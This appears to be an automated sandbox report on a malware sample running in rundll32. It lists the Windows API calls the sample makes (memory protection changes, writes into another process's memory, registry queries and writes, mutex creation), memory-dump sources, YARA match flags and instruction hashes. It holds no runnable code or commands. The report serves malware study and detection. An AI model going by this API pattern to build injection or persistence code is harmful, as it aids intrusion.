                                                          • API String ID: 3527976591-0
                                                          • Opcode ID: 3c8ab56f3603755e988b26635f94d5e2d310067f79c5e42d2b82552f2c8fabb7
                                                          • Instruction ID: 3054d3c5f8ae66e0ff1a7ab5ad353b0a390764cd5d2ab8263aea14acc681eb8b
                                                          • Opcode Fuzzy Hash: 3c8ab56f3603755e988b26635f94d5e2d310067f79c5e42d2b82552f2c8fabb7
                                                          • Instruction Fuzzy Hash: 80E0DF74B24A454FEB006BB888C87BC73E0FB8A301F10083EE885C73A1C63DC8408382
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MemoryReadVirtual
                                                          • String ID:
                                                          • API String ID: 2834387570-0
                                                          • Opcode ID: 64682deeea1213f3746396a1f6b31cb179b6a226c19b00d98d77230462052776
                                                          • Instruction ID: f9b6b33235d3ecc3e75959ea42f597c6189948c5f6ddaa13928d888516b2e043
                                                          • Opcode Fuzzy Hash: 64682deeea1213f3746396a1f6b31cb179b6a226c19b00d98d77230462052776
                                                          • Instruction Fuzzy Hash: 1DE0DF34720F444BEB20AFB488C967C77D0F798305F200939E845C7326C639C8848B42
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph (graph not reproduced)
                                                          APIs
                                                            • Part of subcall function 000C374C: RegCreateKeyA.ADVAPI32(?,?,?,000DDCD3), ref: 000C376F
                                                          • RegQueryValueExA.KERNELBASE ref: 000C2B00
                                                          • RegSetValueExA.KERNELBASE ref: 000C2B58
                                                          • RegCloseKey.KERNELBASE ref: 000C2B65
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Value$CloseCreateQuery
                                                          • String ID: ($(
                                                          • API String ID: 409396109-222463766
                                                          • Opcode ID: 15c0657e6459d840dfd1ed2d718bab6897b6f36c0ec807a258d29cf25e484d4a
                                                          • Instruction ID: c9df155520831b52f48cb9ce1d7d71684e8f3f3bfd09a888ed02773081d49543
                                                          • Opcode Fuzzy Hash: 15c0657e6459d840dfd1ed2d718bab6897b6f36c0ec807a258d29cf25e484d4a
                                                          • Instruction Fuzzy Hash: E031A434618B088FE764EF18EC59B6AB7E5FB98305F10052DE44AC3261DB789D46CB46
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph (graph not reproduced)
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProtectThreadVirtual$ResumeSuspend
                                                          • String ID:
                                                          • API String ID: 3483329683-0
                                                          • Opcode ID: ffbd531617e9de6398172a96c7478380edc2f1a6ff7c6ff8001d704803e1d92c
                                                          • Instruction ID: 2929a7da2bd067356a96c4f23b588884e97c8309648660c369e5d1767eb10d0e
                                                          • Opcode Fuzzy Hash: ffbd531617e9de6398172a96c7478380edc2f1a6ff7c6ff8001d704803e1d92c
                                                          • Instruction Fuzzy Hash: 2661A73061CB484FD7A8EF18E845BAE73D5FB99305F10852EE58AC3292DF34D9458B46
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph (graph not reproduced)
                                                          APIs
                                                          • CreateFileA.KERNELBASE ref: 000D9AA1
                                                          • SetFilePointer.KERNELBASE ref: 000D9ABB
                                                          • ReadFile.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000CED0C), ref: 000D9ADD
                                                          • FindCloseChangeNotification.KERNELBASE ref: 000D9AF8
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$ChangeCloseCreateFindNotificationPointerRead
                                                          • String ID:
                                                          • API String ID: 2405668454-0
                                                          • Opcode ID: 71d59c8fd03c1f47d27e273b6030a364b82ed69c839053eddebff289bcd6d591
                                                          • Instruction ID: fabeb349093372402c5425dc1cffa6cc10337b07d3187b8fffef2cfeb8130cf1
                                                          • Opcode Fuzzy Hash: 71d59c8fd03c1f47d27e273b6030a364b82ed69c839053eddebff289bcd6d591
                                                          • Instruction Fuzzy Hash: 6241C63021CA084FDB58DF2CD8C8A2977E1FB88314F25466EE19AC7252DA79D843C792
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph (graph not reproduced)
                                                          APIs
                                                          • RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000020), ref: 000D654B
                                                          • RtlAllocateHeap.NTDLL ref: 000D656D
                                                          • RegQueryValueExA.KERNELBASE ref: 000D65CF
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: QueryValue$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 2311914766-0
                                                          • Opcode ID: 1f6ad6994c92080283db70fc4a04c579610f830166e95bdc93f203490e1fbcbe
                                                          • Instruction ID: e297869ff75b202c3116391e5184a7eefedfeb2d8a8ab40020335d307808bb7d
                                                          • Opcode Fuzzy Hash: 1f6ad6994c92080283db70fc4a04c579610f830166e95bdc93f203490e1fbcbe
                                                          • Instruction Fuzzy Hash: 7A31A430608B088FDB58EF18E489666B3E0FB98301F11452EE84AC7255DF30E850CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph (graph not reproduced)
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID: H
                                                          • API String ID: 1029625771-2852464175
                                                          • Opcode ID: c49a4acf7bc8f46f379732404cbf2cd9fd691122b626915b3cf3683113567aa9
                                                          • Instruction ID: 1a26a6da63b194482bc0f8758b001804439b80bf91e328005afb5f15a0ff4313
                                                          • Opcode Fuzzy Hash: c49a4acf7bc8f46f379732404cbf2cd9fd691122b626915b3cf3683113567aa9
                                                          • Instruction Fuzzy Hash: 62A18C30518F0A8FE764DF68D89867677E1FBA8315F04862FD84AC7261EB34D941CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph (graph not reproduced)
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcmp
                                                          • String ID:
                                                          • API String ID: 1534048567-3916222277
                                                          • Opcode ID: 1b8dc8031022306e9345a288fd45bae1e1a689bceeb25608fd9f1601aeb3c630
                                                          • Instruction ID: bf784b9c5933b19e678f3ceed3ac5cafd11fc2b8559786939cd15497032ad71a
                                                          • Opcode Fuzzy Hash: 1b8dc8031022306e9345a288fd45bae1e1a689bceeb25608fd9f1601aeb3c630
                                                          • Instruction Fuzzy Hash: B9512971618A084BD738AF1C9C965B977D1F799310F64413ED8DAC3361EA2A9C4287C3
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

Control-flow Graph

(rendered graph not recoverable from extraction; basic blocks ca524-ca71b, two VirtualProtect calls, subcalls into ca140, d8d98, b7380, de348, c35c0 and ce860)

APIs
  • Part of subcall function 000D8D98: VirtualProtect.KERNELBASE ref: 000D8DCB
• VirtualProtect.KERNELBASE ref: 000CA642
• VirtualProtect.KERNELBASE ref: 000CA665
Memory Dump Source
• Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_b1000_control.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: e79ce0048b4222cfd954818e7e7d674908e08b84fbf51762638f79b308669b1e
• Instruction ID: c942fd5ce327160f70230a1f91903c739f6e1147f3f0edeee3a27d261f8d078f
• Opcode Fuzzy Hash: e79ce0048b4222cfd954818e7e7d674908e08b84fbf51762638f79b308669b1e
• Instruction Fuzzy Hash: 5D516E70618B098FDB44EF29D889B69B7E0FB9C305F14456EE44EC3261DB34E985CB82
Uniqueness

Uniqueness Score: -1.00%

APIs
• StrRChrA.KERNELBASE ref: 000BA53A
• RtlAddVectoredContinueHandler.NTDLL ref: 000BA62E
Memory Dump Source
• Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_b1000_control.jbxd
Similarity
• API ID: ContinueHandlerVectored
• String ID:
• API String ID: 3758255415-0
• Opcode ID: 5cfdce6ba604bbcc091d7b921d4918bbcddbfb62c8266db36f703a1fb59b6e8d
• Instruction ID: 6f74b5a1509af468208c2b65b39fd42fc6dddc05afc88c1945e68826e55ce011
• Opcode Fuzzy Hash: 5cfdce6ba604bbcc091d7b921d4918bbcddbfb62c8266db36f703a1fb59b6e8d
• Instruction Fuzzy Hash: B241E970708B0A8FEB65EF38985867A77F1EB99355B24413ED446C3261DF78C546CB02
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyExA.KERNELBASE(?,?,?,?,?,?,00018F78,000D3022), ref: 000D5480
• RegCloseKey.KERNELBASE ref: 000D5503
Memory Dump Source
• Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_b1000_control.jbxd
Similarity
• API ID: CloseOpen
• String ID:
• API String ID: 47109696-0
• Opcode ID: fddb71cb6013c17b65e6c5c58e4190fdbcf9f51217116a578ff1d9070016e93f
• Instruction ID: d3de95c0aec7f5a9498394d64cb08f6b4e853b50b36ac8553ef25f2428e66140
• Opcode Fuzzy Hash: fddb71cb6013c17b65e6c5c58e4190fdbcf9f51217116a578ff1d9070016e93f
• Instruction Fuzzy Hash: 24312E30618F0C4FDB94EF68E894A6677E1F7A8311B414A6EA44EC3365DB34D945C782
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_b1000_control.jbxd
Similarity
• API ID: CloseQueryValue
• String ID:
• API String ID: 3356406503-0
• Opcode ID: 51d92207df379dc83875e3aa58fb36a40af9c9bbd6bc0580ad4ef2799a51313c
• Instruction ID: 2a58b9db34c3addfee1fcc011c0a86754ec2895d6622b059e6e641f006594cac
• Opcode Fuzzy Hash: 51d92207df379dc83875e3aa58fb36a40af9c9bbd6bc0580ad4ef2799a51313c
• Instruction Fuzzy Hash: D1215E70618F088FE798EF68E889665B7E1FB98311F10446EE44AC3361EB35DD41CB92
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegCreateKeyA.ADVAPI32(?,?,?,000DDCD3), ref: 000C376F
• RegOpenKeyA.ADVAPI32(?,?,?,000DDCD3), ref: 000C377C
Memory Dump Source
• Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_b1000_control.jbxd
Similarity
• API ID: CreateOpen
• String ID:
• API String ID: 436179556-0
• Opcode ID: 3a96c24ec20924aeac69af3be795014768ecc2de191383b8bce9cd8f3f8db1b1
• Instruction ID: 2e0b48ce006ac2c89e525595b8c16835bdef460275d46608edfea21f6cf07e0e
• Opcode Fuzzy Hash: 3a96c24ec20924aeac69af3be795014768ecc2de191383b8bce9cd8f3f8db1b1
• Instruction Fuzzy Hash: B201847061CB098FDB54EB5C9488B2ABBE5EBAD345F14452EE88DC3360DA74C9458743
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_b1000_control.jbxd
Similarity
• API ID: CreateQueueThreadUser
• String ID:
• API String ID: 3600083758-0
• Opcode ID: 36f65ecab13cfc995b4b55937e947feb4e6208ee9d24dec18057a5403e22070c
• Instruction ID: 0ef238b189e443edbddc30693ca9d561d79e8a799760c18b3433a85c85d5175b
• Opcode Fuzzy Hash: 36f65ecab13cfc995b4b55937e947feb4e6208ee9d24dec18057a5403e22070c
• Instruction Fuzzy Hash: 73014C30714A094FABA4EF6DA84D63977F2EB98351724457AE419C3270DF78DC428B86
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_b1000_control.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: a106af5d0ced5a47d6bcdf0535ea1047a1c970f0eef90624918c376d659d4d5b
• Instruction ID: a3971692184a85b2b1c6e3c008a80740adff5ece49a56040fda66e79ab936b33
• Opcode Fuzzy Hash: a106af5d0ced5a47d6bcdf0535ea1047a1c970f0eef90624918c376d659d4d5b
• Instruction Fuzzy Hash: 3261503061CF099FD794EF18D889AA577E1FBAC301B50456EE84AC3661EB34EC41CB86
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlDeleteBoundaryDescriptor.NTDLL ref: 000C9A42
Memory Dump Source
• Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_b1000_control.jbxd
Similarity
• API ID: BoundaryDeleteDescriptor
• String ID:
• API String ID: 3203483114-0
• Opcode ID: 26bc7b7e104518ddba554de4156c252715addc58dba5be73b5a25652a6bd6292
• Instruction ID: c20bec89693025086d0acd2e49af39f989bc54d7c63cebb22219d706cd03150c
• Opcode Fuzzy Hash: 26bc7b7e104518ddba554de4156c252715addc58dba5be73b5a25652a6bd6292
• Instruction Fuzzy Hash: 0841A630618E5C8FDB58EF6CD889AA973E1F759310B51412EE44AC3262DA78DC86C7C2
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_b1000_control.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 6de2a5f7a581128cc52d6808a1fb70f5bdda2aa886d81256fa9f1a0c77678a23
• Instruction ID: e39ab25e1d18938092dbf67834df9e4e94fefa798820dd342eb86c0d70bfd3c5
• Opcode Fuzzy Hash: 6de2a5f7a581128cc52d6808a1fb70f5bdda2aa886d81256fa9f1a0c77678a23
• Instruction Fuzzy Hash: 4331217061CB484FDBA4EF1C9885B65B7E1FB99311F11466EE84DC3262DB70EC418B86
Uniqueness

Uniqueness Score: -1.00%

APIs
• SleepEx.KERNEL32(?,?,?,?,?,?,0000007E,000DC00F), ref: 000D0D31
Memory Dump Source
• Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_b1000_control.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 207ec0fc07338e3f1373991df744463c1f1d3d026ca20c19ccf35147a8500794
• Instruction ID: 6cf624d6033da1fb443d710c2f7263c97712eeeecc435553ddd84d4664ed7c23
• Opcode Fuzzy Hash: 207ec0fc07338e3f1373991df744463c1f1d3d026ca20c19ccf35147a8500794
• Instruction Fuzzy Hash: 723150303187048BEB58EF69D8D5AAA73E3EB98300704C53EA44BC7361DF78D9469751
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlDeleteBoundaryDescriptor.NTDLL ref: 000C1A3E
Memory Dump Source
• Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_b1000_control.jbxd
Similarity
• API ID: BoundaryDeleteDescriptor
• String ID:
• API String ID: 3203483114-0
• Opcode ID: 9ea574213d0b9dd17366d7da8b7244112765cf04dfd161500232577f378886c1
• Instruction ID: 3cdf2efb2aca8c1e369238253287ef2527aa0e3044d5a9968dbee55fee32b86b
• Opcode Fuzzy Hash: 9ea574213d0b9dd17366d7da8b7244112765cf04dfd161500232577f378886c1
• Instruction Fuzzy Hash: 5721923460CA0D4FDB98EF69A8457B9B7E1F799301B60842EE55FC3262DE24DC478782
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000C374C: RegCreateKeyA.ADVAPI32(?,?,?,000DDCD3), ref: 000C376F
• RegQueryValueExA.KERNELBASE ref: 000DE508
Memory Dump Source
• Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_b1000_control.jbxd
Similarity
• API ID: CreateQueryValue
• String ID:
• API String ID: 2711935003-0
• Opcode ID: 535672abe70d0168ee810ee176c23215db19a3ba1e8f58e6fcab72b62e0214ff
• Instruction ID: 142c608fdeedde880f437008d501d5ca93846e4d3f52753a027c6bd409ec5280
• Opcode Fuzzy Hash: 535672abe70d0168ee810ee176c23215db19a3ba1e8f58e6fcab72b62e0214ff
• Instruction Fuzzy Hash: EA21F17061CB4C8FE794EF68D448B5AB7E1FB98345F40092EA48AC7355EB74D940CB52
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_b1000_control.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 3f038f664194ed09418985c20b287aca218c62dbb155e60d2d7415b02c667552
• Instruction ID: f453810d0332d6f2fde66f7976c108ffbc2f61a27061924746adbf2bb8e2e056
• Opcode Fuzzy Hash: 3f038f664194ed09418985c20b287aca218c62dbb155e60d2d7415b02c667552
• Instruction Fuzzy Hash: 6711933160CB098F9B48EF58E849525B7E5FB98311B00863EE98BC3345EF70ED458B96
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000C1950: NtWriteVirtualMemory.NTDLL ref: 000C196F
• VirtualProtectEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000DD348
Memory Dump Source
• Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_b1000_control.jbxd
Similarity
• API ID: Virtual$MemoryProtectWrite
• String ID:
• API String ID: 1789425917-0
• Opcode ID: 6b5c0d0765a110b65d8f4f092558aae6303376241adeb56fa8819492f7b7c9bb
• Instruction ID: 1a1ec2f6300bc82a252407742e25c67fbab0e80344953d77f28c0ad71a4b0448
• Opcode Fuzzy Hash: 6b5c0d0765a110b65d8f4f092558aae6303376241adeb56fa8819492f7b7c9bb
• Instruction Fuzzy Hash: 4C017C70618B088FCB48EF58A0C5529B7E0EB9C310B4405AEE84DC7346CB70DD44CB86
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindCloseChangeNotification.KERNELBASE ref: 000BA9F1
Memory Dump Source
• Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_b1000_control.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
• Opcode ID: 5e627e4eeb0547a02e045b33c94f03be2364a689ea05fb59daad38687b791655
• Instruction ID: f93252896060e5002f1cee1f3b0eaa508024af1ccf56b7e2ff3fa22b7acafcb3
• Opcode Fuzzy Hash: 5e627e4eeb0547a02e045b33c94f03be2364a689ea05fb59daad38687b791655
• Instruction Fuzzy Hash: 7FF06231318B454FEF98DF69D498A6AB3E1FFD8301F44162DB546C3250DB78C8454742
Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Executed Functions

Memory Dump Source
• Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd
Similarity
• API ID: InformationQueryToken$Close
• String ID: 0
• API String ID: 459398573-4108050209
• Opcode ID: b00bdbe5e76e8574fbf38c79017efbcac25b001069e063d358994e26018d4f43
• Instruction ID: 10a1c618c346285ccefee265ab951e2206f890788753a96cecb68cc18b5a6196
• Opcode Fuzzy Hash: b00bdbe5e76e8574fbf38c79017efbcac25b001069e063d358994e26018d4f43
• Instruction Fuzzy Hash: 88413930208B898FE764EF58D894BAAB7E6FB98311F50493DE58EC3254DB349945CB42
Uniqueness

Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Control-flow graph (rendered graph not recoverable from extraction): function basic blocks 195d8adb948-195d8adc4ad; API calls inside the graph: CreateMutexExA, GetUserNameA
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateUser$MutexNameQueueThread
                                                          • String ID:
                                                          • API String ID: 2503873790-0
                                                          • Opcode ID: bd03c217eebf3514f0dc141ef06a426e4807aa03d6b913fdaf265373ad3cc355
                                                          • Instruction ID: 2a923d570d30774bedfe8b6b2ea18094f3f4f6ab0a60923af0e478ab31b6bc27
                                                          • Opcode Fuzzy Hash: bd03c217eebf3514f0dc141ef06a426e4807aa03d6b913fdaf265373ad3cc355
                                                          • Instruction Fuzzy Hash: 9472C771618E088FF759EFA8EC956A573E2F758710F10452ED54BD32A1EE34D842CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Control-flow graph (rendered graph not recoverable from extraction): function basic blocks 195d8aef004-195d8aef388; API calls inside the graph: NtProtectVirtualMemory (two call sites)
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.756043253.00000195D8AEF000.00000040.00020000.sdmp, Offset: 00000195D8AEF000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8aef000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: eafab29160fceb955bbbcbe4a5a32561ec8a2626c215229b8f1f7ae10943d3c5
                                                          • Instruction ID: cd2f61a479eb35b622b1642637931f3adf99ea22ce310edb41b881df0d191a16
                                                          • Opcode Fuzzy Hash: eafab29160fceb955bbbcbe4a5a32561ec8a2626c215229b8f1f7ae10943d3c5
                                                          • Instruction Fuzzy Hash: AAB10631308B884FE766DF68D8917E9B3E2FB95320F5449ADD58FC3292D734A4068742
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateHeap
                                                          • String ID:
                                                          • API String ID: 10892065-0
                                                          • Opcode ID: b79121b0bf9300899778867a254ee6e6f699830a218d847d70ca451a66ee4414
                                                          • Instruction ID: 30574790a01222e83df61b7976aa11c9843cc68924407830bb781d98fafe9b7d
                                                          • Opcode Fuzzy Hash: b79121b0bf9300899778867a254ee6e6f699830a218d847d70ca451a66ee4414
                                                          • Instruction Fuzzy Hash: F891D570608F098FF759DF68DC587AA33E6FB94321F05452ED54AD32A1EE78D8028B42
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: 1a5ec96146b37ae29432bfa8ac23ac72cbb7241fa644212a0b5fd835a5577e33
                                                          • Instruction ID: 64c9f8db09c103ef7142d22031c3ed03d409d7f06787ab0f783b58c73d7d0a43
                                                          • Opcode Fuzzy Hash: 1a5ec96146b37ae29432bfa8ac23ac72cbb7241fa644212a0b5fd835a5577e33
                                                          • Instruction Fuzzy Hash: 3E01A230214E0C8FFB94DFA9C8D4AA573E2FBA8315F94046EA50DD3194D738D891C702
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Value$CloseCreateQuery
                                                          • String ID: ($(
                                                          • API String ID: 409396109-222463766
                                                          • Opcode ID: 15c0657e6459d840dfd1ed2d718bab6897b6f36c0ec807a258d29cf25e484d4a
                                                          • Instruction ID: f4354f470d00e9ebab5fd5518bfc8bb836d79eb4ce78b9b48f299b83108d89a0
                                                          • Opcode Fuzzy Hash: 15c0657e6459d840dfd1ed2d718bab6897b6f36c0ec807a258d29cf25e484d4a
                                                          • Instruction Fuzzy Hash: F931D234218F088FF364EF58E8687A6B7E6FB98315F14052DE44DC32A1EB789846C706
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: QueryValue$Close
                                                          • String ID:
                                                          • API String ID: 1979452859-0
                                                          • Opcode ID: 51d92207df379dc83875e3aa58fb36a40af9c9bbd6bc0580ad4ef2799a51313c
                                                          • Instruction ID: a7250e9f3ac9ab620afd2c0abd3f0254d743ece86c522ba5581c25bc8e3b67fb
                                                          • Opcode Fuzzy Hash: 51d92207df379dc83875e3aa58fb36a40af9c9bbd6bc0580ad4ef2799a51313c
                                                          • Instruction Fuzzy Hash: 3A216D70618B088FE758EF68E899765B7E1FB98311F10442EE44ED3261EB34D841CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Control-flow graph (rendered graph not recoverable from extraction): function basic blocks 195d8adf980-195d8adfc6d; API calls inside the graph: LoadLibraryA
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID: H
                                                          • API String ID: 1029625771-2852464175
                                                          • Opcode ID: c49a4acf7bc8f46f379732404cbf2cd9fd691122b626915b3cf3683113567aa9
                                                          • Instruction ID: 0b25a6faad0959eb4f0a893d8827cdf2a14175479c8bb978c9bb07f791eb0938
                                                          • Opcode Fuzzy Hash: c49a4acf7bc8f46f379732404cbf2cd9fd691122b626915b3cf3683113567aa9
                                                          • Instruction Fuzzy Hash: F5A16E30508F098FF765DF98D8987A677E2FB98315F04462AD94AC72A1FB34D941CB82
                                                          Uniqueness

